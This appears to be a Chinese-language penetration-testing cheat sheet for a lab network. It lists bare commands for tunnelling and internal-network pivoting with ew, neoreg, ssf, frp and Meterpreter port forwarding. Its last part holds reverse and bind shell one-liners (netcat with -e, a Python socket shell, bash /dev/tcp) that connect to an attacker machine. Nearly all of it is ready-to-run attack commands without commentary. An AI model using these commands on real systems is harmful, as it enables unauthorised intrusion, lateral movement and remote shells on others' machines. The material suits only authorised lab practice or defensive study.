windows 7
ip:192.168.10.15(外)
192.168.52.143(内)
目标机器:
windows 2008R2
ip:192.168.52.138
攻击机器:
windows 2008
ip:192.168.10.3
kali:
msf5:192.168.10.14
msf6:192.168.10.11
ew -s ssocksd -l 888
ew_for_Win.exe -s rcsocks -l 1080 -e 1234
ew_for_Win.exe -s rssocks -d 192.168.10.3 -e 1234
python neoreg.py generate -k 123456
python neoreg.py -k 123456 -u http://192.168.10.15/tunnel.php
admin.exe -lport 9999
agent.exe -rhost 192.168.10.3 -rport 9999
goto 1
socks 6666
ssfd.exe ‐p 1333
ssfd.exe ‐D 1222 ‐p 1333 192.168.10.15
ssfd.exe ‐p 1234
ssf.exe ‐F 12345 ‐p 1234 192.168.10.3
[common]
bind_port = 6666
frps.exe -c frps.ini
[common]
server_addr = 192.168.10.3
server_port = 6666
[http_proxy]
type=tcp
remote_port=7777
plugin=socks5
frpc.exe ‐c frpc.ini
set version 4a
portfwd add -l 3389 -r 192.168.52.138 -p 3389
nc -lvp 4444 -e /bin/sh linux
nc -lvp 4444 -e c:windowssystem32cmd.exe windows
nc 4444
nc -lvp 1234
nc 1234 -e /bin/sh linux
nc 1234 -e cmd.exe windows
python反向shell
nc -lvp 2222
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.10.3',2222));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
nc -lvp 2222
bash -i >& /dev/tcp/192.168.10.3/2222 0>&1
点击数:25